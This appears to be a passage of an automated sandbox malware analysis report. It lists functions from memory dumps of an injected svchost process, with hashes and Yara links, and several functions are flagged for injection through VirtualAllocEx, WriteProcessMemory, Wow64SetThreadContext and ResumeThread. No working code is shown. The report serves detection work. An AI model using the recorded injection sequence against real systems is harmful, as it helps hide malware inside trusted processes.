                                                                          Function 00007FFD9B8B3740 Relevance: 1.7, APIs: 1, Instructions: 211COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 785 7ffd9b8b3740-7ffd9b8b4906 VirtualProtect 791 7ffd9b8b4908 785->791 792 7ffd9b8b490e-7ffd9b8b4968 785->792 791->792
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8b3000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 08b16ae99dd00191669d3bacaa809e2ca9ee3a27da4b810d4002d1396c305f75
                                                                          • Instruction ID: ca855410ca1db984f78c28da4ba38a6b37242fd1597ac4aa0c89975091cd0c76
                                                                          • Opcode Fuzzy Hash: 08b16ae99dd00191669d3bacaa809e2ca9ee3a27da4b810d4002d1396c305f75
                                                                          • Instruction Fuzzy Hash: 6361907090975C8FDB58DFA8C895AE9BBF0FF1A300F1041AED049972A2DB74A945CF85
                                                                          Function 00007FFD9B8D2476 Relevance: 1.7, APIs: 1, Instructions: 210injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 795 7ffd9b8d2476-7ffd9b8d253c 799 7ffd9b8d2564-7ffd9b8d25fd WriteProcessMemory 795->799 800 7ffd9b8d253e-7ffd9b8d2561 795->800 801 7ffd9b8d2605-7ffd9b8d2661 799->801 802 7ffd9b8d25ff 799->802 800->799 802->801
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 043e723a9044323e93b91e3fb777de977c6aa7a4469b196187d97d81422c6bd7
                                                                          • Instruction ID: 4e7700af655a0ab99d5dc4bf5376be38f201835bcb9c9daa04f1626ccab61521
                                                                          • Opcode Fuzzy Hash: 043e723a9044323e93b91e3fb777de977c6aa7a4469b196187d97d81422c6bd7
                                                                          • Instruction Fuzzy Hash: 86611370A08A5C8FDB98DF98D895BE9BBF1FB69310F1041AED04DE3251DB74A985CB40
                                                                          Function 00007FFD9B8B47A6 Relevance: 1.7, APIs: 1, Instructions: 202memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 804 7ffd9b8b47a6-7ffd9b8b47cf 805 7ffd9b8b47da-7ffd9b8b4906 VirtualProtect 804->805 806 7ffd9b8b47d1-7ffd9b8b47d9 804->806 810 7ffd9b8b4908 805->810 811 7ffd9b8b490e-7ffd9b8b4968 805->811 806->805 810->811
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8b3000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: ce8b4227f19ddaa62054e0cd19ae38612401a43661d2768291ac931574e7a9db
                                                                          • Instruction ID: 2acf608d2c841fc0181f1fdfbeab180d1004b55fc532fa06fafa9e09ddefc1fd
                                                                          • Opcode Fuzzy Hash: ce8b4227f19ddaa62054e0cd19ae38612401a43661d2768291ac931574e7a9db
                                                                          • Instruction Fuzzy Hash: A2517F7090874C8FDB58DF68C855BE9BBF0FB5A310F1402AED449E3292DB74A985CB81
                                                                          Function 00007FFD9B8D1F1D Relevance: 1.7, APIs: 1, Instructions: 195injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 814 7ffd9b8d1f1d-7ffd9b8d2074 WriteProcessMemory 817 7ffd9b8d207c-7ffd9b8d20d2 814->817 818 7ffd9b8d2076 814->818 818->817
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 4cb1845d1be91cbec5b0c0955f6ba0171e89f8a09f80f3ec7b9703f1c2ca83d5
                                                                          • Instruction ID: 46b81132d4f2a96ea247a5d56da60b7f5ba4b1d16cc3f25dfae22a62e5e6f077
                                                                          • Opcode Fuzzy Hash: 4cb1845d1be91cbec5b0c0955f6ba0171e89f8a09f80f3ec7b9703f1c2ca83d5
                                                                          • Instruction Fuzzy Hash: 3D515870908A4C8FDB98DF58D885BE9BBF1FB6A310F1041AED44DE7252DA70A985CF40
                                                                          Function 00007FFD9B8D1C58 Relevance: 1.7, APIs: 1, Instructions: 184memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 820 7ffd9b8d1c58-7ffd9b8d1d92 VirtualAllocEx 825 7ffd9b8d1d9a-7ffd9b8d1df2 820->825 826 7ffd9b8d1d94 820->826 826->825
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 20ac76e6a955cca3e58c9c3ddd0565c720da8ba0d44e2ecc47a680a0b68dc6af
                                                                          • Instruction ID: 20850abe8cf8f3365bc1f7db3987cbaecfc788ac1b8bf22bf7a3d626436f3c53
                                                                          • Opcode Fuzzy Hash: 20ac76e6a955cca3e58c9c3ddd0565c720da8ba0d44e2ecc47a680a0b68dc6af
                                                                          • Instruction Fuzzy Hash: 6151F470A08A1C8FDF98EF58C895BE9BBF1FB69314F1051AAD44DE3251DB70A981CB44
                                                                          Function 00007FFD9B8D2275 Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 899 7ffd9b8d2275-7ffd9b8d2281 900 7ffd9b8d2285-7ffd9b8d22bf 899->900 901 7ffd9b8d2283 899->901 902 7ffd9b8d22c5-7ffd9b8d2367 Wow64SetThreadContext 900->902 901->900 901->902 905 7ffd9b8d2369 902->905 906 7ffd9b8d236f-7ffd9b8d23b9 902->906 905->906
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 5851f8dc239618a294181019a233860330136d39a1f2f818bdd8dff9febdcaae
                                                                          • Instruction ID: c8fccb0acd1c6b851b90b33cfc15f28dd9aa7c412b4171415abd885af74f0b36
                                                                          • Opcode Fuzzy Hash: 5851f8dc239618a294181019a233860330136d39a1f2f818bdd8dff9febdcaae
                                                                          • Instruction Fuzzy Hash: 45417C30A0864D8FDBA8DFA8D845BEDBBF1FB99310F20426AD049D7256D7309985CF40
                                                                          Function 00007FFD9B8D282A Relevance: 1.6, APIs: 1, Instructions: 149threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: cd61050e516d2f38c253723b35e3f33c77bbdffbfe98725e39941cb8c75b4584
                                                                          • Instruction ID: 0b7732e6bf7dd788455232b13cf4e395786b3f68e06db2034227aa7c3a7e6dad
                                                                          • Opcode Fuzzy Hash: cd61050e516d2f38c253723b35e3f33c77bbdffbfe98725e39941cb8c75b4584
                                                                          • Instruction Fuzzy Hash: 2E415C70E0864C8FDB98DF98D895BEDBBF1EB59310F1041AAD00DD7292DA34A846CB40
                                                                          Function 00007FFD9B8B0A0D Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8b0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 7170b1d589fb1e4cd46d72328f8bea376acddda3d1aec330fccaeb790c5df911
                                                                          • Instruction ID: 71d2dbf544d9073cd60d6865cdffe9edb1fcc2a57ba2bcc038dad54b98bd3e12
                                                                          • Opcode Fuzzy Hash: 7170b1d589fb1e4cd46d72328f8bea376acddda3d1aec330fccaeb790c5df911
                                                                          • Instruction Fuzzy Hash: 1C418F34A0875C8FDB54DFA8C889BEDBBF0FB1A311F1041AAD049D7252DB74A945CB41
                                                                          Function 00007FFD9B8B04BA Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8b0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 1c33fe11f24b4fb623ea540b2fc1b5c9f33731fc83a00bc69aeb2da1f8d65f2a
                                                                          • Instruction ID: f3b48265a86cabe9f69aa6646b10775eeab2eb5e659d0d33d51326bb497cab17
                                                                          • Opcode Fuzzy Hash: 1c33fe11f24b4fb623ea540b2fc1b5c9f33731fc83a00bc69aeb2da1f8d65f2a
                                                                          • Instruction Fuzzy Hash: 98316A74A0871C8FEB58DF98D889BEDB7F0FB19311F10416AD00AE7252DB74A985CB50
                                                                          Function 00007FFD9B980E29 Relevance: 1.0, Instructions: 961COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1994756231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b980000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c52539776d8b442befabffb6a0a64bea705806fd3d472709a182f97f113de3e7
                                                                          • Instruction ID: d7c684026ab31ac09c6f4bfc3c4b4373ef6a4af03c544a09204cef0e187610bd
                                                                          • Opcode Fuzzy Hash: c52539776d8b442befabffb6a0a64bea705806fd3d472709a182f97f113de3e7
                                                                          • Instruction Fuzzy Hash: 89522972A1EBD95FD766DB7888655A47FE0EF5A304B0A01FFC0C9CB0A3D9286906C341
                                                                          Function 00007FFD9B8C2169 Relevance: .8, Instructions: 785COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 68852acea4e701cd98b34177a04175d4d545677da7927219cdc54a751d3d4974
                                                                          • Instruction ID: 354eea64a6f4c400bdb3e6fd8be81a0c410ebca66a61a01a13872474cdcf648b
                                                                          • Opcode Fuzzy Hash: 68852acea4e701cd98b34177a04175d4d545677da7927219cdc54a751d3d4974
                                                                          • Instruction Fuzzy Hash: 1C32E77070EA498FD7A9EF68D4A567977E1FF59300B0500BEE48AC71E2DE24ED418741
                                                                          Function 00007FFD9B8C0099 Relevance: .5, Instructions: 541COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6e7552a45636fa7a0983f3debf1b7e066e1e7f36d561d286ed11b03db973f7a2
                                                                          • Instruction ID: cfd12a68687ddc9591591944c7aaa6c12b16c4b9ac743bf81b6ff51671e1e828
                                                                          • Opcode Fuzzy Hash: 6e7552a45636fa7a0983f3debf1b7e066e1e7f36d561d286ed11b03db973f7a2
                                                                          • Instruction Fuzzy Hash: B7027A7072D78A4FD329DB2884914B6B7E2FFC9305B14867EE4C6C72A5DA34E906C781
                                                                          Function 00007FFD9B8C1240 Relevance: .5, Instructions: 460COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5baaf1c06b520f2d44fcfa4c9922e6c067654c215c32356def5f6f57049d670
                                                                          • Instruction ID: 5f09913e24de2b60d467817d957ca6f717109260faff80454042b832836e6775
                                                                          • Opcode Fuzzy Hash: e5baaf1c06b520f2d44fcfa4c9922e6c067654c215c32356def5f6f57049d670
                                                                          • Instruction Fuzzy Hash: 77E12C71B0E98D4FE7A4FB6C88A56B97BE1FF5D300F4501FAD04DC75A2DA2868068741
                                                                          Function 00007FFD9B8BCD58 Relevance: .3, Instructions: 259COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a318300c669d6b07264f0a77141e9297064b558f0479d4b5f449442212434549
                                                                          • Instruction ID: 5bacf29bb81806bc640be3ee9b0980811dc73cdbe801ed07df2f1e0414e5956b
                                                                          • Opcode Fuzzy Hash: a318300c669d6b07264f0a77141e9297064b558f0479d4b5f449442212434549
                                                                          • Instruction Fuzzy Hash: 8A718C3170DB9A4FE769CB6CC4A50A5B7D2FFC9300B05467EE0C9C72B5D924A9028F81
                                                                          Function 00007FFD9B8C4225 Relevance: .3, Instructions: 255COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b5e40f9d455ee50f4c5a96f5e2205f8bd3f551c0952ce99b3af70b5cd52b5d5e
                                                                          • Instruction ID: 797467078eb342e7bfdbc62dc2cfcfdc8fe464a51ecefa84a17a31fdce31588f
                                                                          • Opcode Fuzzy Hash: b5e40f9d455ee50f4c5a96f5e2205f8bd3f551c0952ce99b3af70b5cd52b5d5e
                                                                          • Instruction Fuzzy Hash: D3712471B0DD8D4FDB58EB6C9465AB87BE1EF99300F0901AFD04DC71A6DE24AC428740
                                                                          Function 00007FFD9B8C2450 Relevance: .2, Instructions: 235COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab4c9c4d4fbe1bd3e738e269c8a3d4f463f9ecbc132fadee34351841c7c29c35
                                                                          • Instruction ID: b7b9bc84a408add3aaa881283df1894ee127f539332ca3846292039a0ee7c5f9
                                                                          • Opcode Fuzzy Hash: ab4c9c4d4fbe1bd3e738e269c8a3d4f463f9ecbc132fadee34351841c7c29c35
                                                                          • Instruction Fuzzy Hash: 40714AB1A1E68E4FE3B5AFA8843257577D0EF59310B0601FBC44AC71E3EE18AD068741
                                                                          Function 00007FFD9B981269 Relevance: .2, Instructions: 229COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1994756231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b980000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 577979f8856d3ae51d4400883fae920a844f7de1bb882e92809cd73de5c4028e
                                                                          • Instruction ID: 004fa59a6abb51c8cab97d41ee717b84b4b6399c40978aab7bac9bacab974216
                                                                          • Opcode Fuzzy Hash: 577979f8856d3ae51d4400883fae920a844f7de1bb882e92809cd73de5c4028e
                                                                          • Instruction Fuzzy Hash: 53611A3161EADD4FDB66DB7488759A57BF1EF1A30470A01EBC08AC71A7D928A906C341
                                                                          Function 00007FFD9B8C4D45 Relevance: .2, Instructions: 192COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf8fb698c39d4a78735560afbacbab076eeb7530c73f0a2e2c68f562fc37d03f
                                                                          • Instruction ID: 241820b09f32516374c04d00479680b0e000f0fd5643ba2b9538eed649e77319
                                                                          • Opcode Fuzzy Hash: bf8fb698c39d4a78735560afbacbab076eeb7530c73f0a2e2c68f562fc37d03f
                                                                          • Instruction Fuzzy Hash: F551E770A0AA8D8FDB55EF68C465AED7FF0FF5A310B0901AFD049D71B2CA25A941C781
                                                                          Function 00007FFD9B8C1468 Relevance: .2, Instructions: 172COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0ea0e3c17fa9db783f54fee4199665e954b6a16873685f1d5817a6a9bff1dbcb
                                                                          • Instruction ID: 986cf4e1f2bbab3f4b81d89143d5045d0e773ae8ba10df27d7ee09a408003cb6
                                                                          • Opcode Fuzzy Hash: 0ea0e3c17fa9db783f54fee4199665e954b6a16873685f1d5817a6a9bff1dbcb
                                                                          • Instruction Fuzzy Hash: 8F51C771E19A8D4FEB54FBA888A5BECBBE1FF59300F4401BAD049D7196DE3458828B41
                                                                          Function 00007FFD9B8C23C4 Relevance: .2, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 10db249f9e9afdc1d9333cb302c64a6ce0230eb3791726056777138bcd493bdf
                                                                          • Instruction ID: ad7cd0671d0ea9fba91d03126029ca22f82b7120d400c38b4d40eabe4f2f6edc
                                                                          • Opcode Fuzzy Hash: 10db249f9e9afdc1d9333cb302c64a6ce0230eb3791726056777138bcd493bdf
                                                                          • Instruction Fuzzy Hash: CE5127B161E74D8FD7A5EFA884616B577D0EF59310F0501BED48AC71E2DE28ED068780
                                                                          Function 00007FFD9B8C642B Relevance: .2, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2d00f9c06d74c5ff1e8e9933ca8cb4409f1144acfff634c78740a071cf1d1550
                                                                          • Instruction ID: 1f7446d4f264455ab43f13b2e6168f90d8f65b4c59a19e5828b62cd6e034a4cb
                                                                          • Opcode Fuzzy Hash: 2d00f9c06d74c5ff1e8e9933ca8cb4409f1144acfff634c78740a071cf1d1550
                                                                          • Instruction Fuzzy Hash: 524166B260E7890FD71E9B2488210B67B90EB53320B1682BFD487C75A7EC186D438392
                                                                          Function 00007FFD9B8C10E9 Relevance: .2, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 649cc15107170fd4b689a58edde15af68fe52d69cf85e2c4f0cdb99a989dc11a
                                                                          • Instruction ID: 718ab1c8c997667a45bf4ee2e8856ad3e30c4b48726ae9519ade18680be5cdbb
                                                                          • Opcode Fuzzy Hash: 649cc15107170fd4b689a58edde15af68fe52d69cf85e2c4f0cdb99a989dc11a
                                                                          • Instruction Fuzzy Hash: 5B412952B0EA890FF399A6AC08B57B47BD2EF9A250F0502FBD049C72D7DC1C2C064381
                                                                          Function 00007FFD9B8BE5FB Relevance: .1, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c19be804db6f871e0fae2bd32a2476f84e249578f04c63a3a5f5bd219f9a599c
                                                                          • Instruction ID: ec6912bc75cb9b6f9f6f210f6e8c84f2dfa5b36a8480e392c6ae75f9cac65009
                                                                          • Opcode Fuzzy Hash: c19be804db6f871e0fae2bd32a2476f84e249578f04c63a3a5f5bd219f9a599c
                                                                          • Instruction Fuzzy Hash: 4641F23060D76C4FD3ACDB6CC06147A77E1EF8AA51B51077EE4DB83692DA25E9028B81
                                                                          Function 00007FFD9B8BEDAF Relevance: .1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8c43253abd193abcef34635ff68036a6d858f13dcbfd68622f1da15edfdf767f
                                                                          • Instruction ID: 95423f56049071f11537255ca47879a6c76331fe6557a72b454dda541c3b5df5
                                                                          • Opcode Fuzzy Hash: 8c43253abd193abcef34635ff68036a6d858f13dcbfd68622f1da15edfdf767f
                                                                          • Instruction Fuzzy Hash: E231C531709A1D4FDBA8DB2C946167873D2EF98701F1501BEE04EC3696DE24AD468BC5
                                                                          Function 00007FFD9B8C664E Relevance: .1, Instructions: 117COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86d9a7ae5f3f6a148ea76b3926d8ab488f45254a01b9b1b9f6e8ded86196551c
                                                                          • Instruction ID: 50faf80b5558ca5fe076c727929ee31c7fa52af305e13720af39fcc6913fa4d2
                                                                          • Opcode Fuzzy Hash: 86d9a7ae5f3f6a148ea76b3926d8ab488f45254a01b9b1b9f6e8ded86196551c
                                                                          • Instruction Fuzzy Hash: DE41BCA1A1E3C64FE31B977488714643FB0AF5721471A44FFC0C6CB1F7D918A90A8762
                                                                          Function 00007FFD9B8C6275 Relevance: .1, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44efebef162fa06e581b91cea294f7166051251f10ebb37803f25d7139036b2d
                                                                          • Instruction ID: 9cdc8c5d66af93f725737f85132fc79160b6d5732859978b3b7be28239dba4ff
                                                                          • Opcode Fuzzy Hash: 44efebef162fa06e581b91cea294f7166051251f10ebb37803f25d7139036b2d
                                                                          • Instruction Fuzzy Hash: C231E16160E7C60FD317A77898705A0BFA2AF97310B1A41FBC095CB5E7D828694AC352
                                                                          Function 00007FFD9B8BFCD8 Relevance: .1, Instructions: 105COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5eb504b910f1e1725300241261c12921e8f66172220237441bfe506c3e8a620c
                                                                          • Instruction ID: aa8bad021ea552b915ab69be376c254b22d754c42d0824ded41bbc0c04d3aad2
                                                                          • Opcode Fuzzy Hash: 5eb504b910f1e1725300241261c12921e8f66172220237441bfe506c3e8a620c
                                                                          • Instruction Fuzzy Hash: 89212921B0EA5D1FE798EBBD6CA977463C1EFAC211B0942BBA04DC72E6DC145C424781
                                                                          Function 00007FFD9B8C6C26 Relevance: .1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
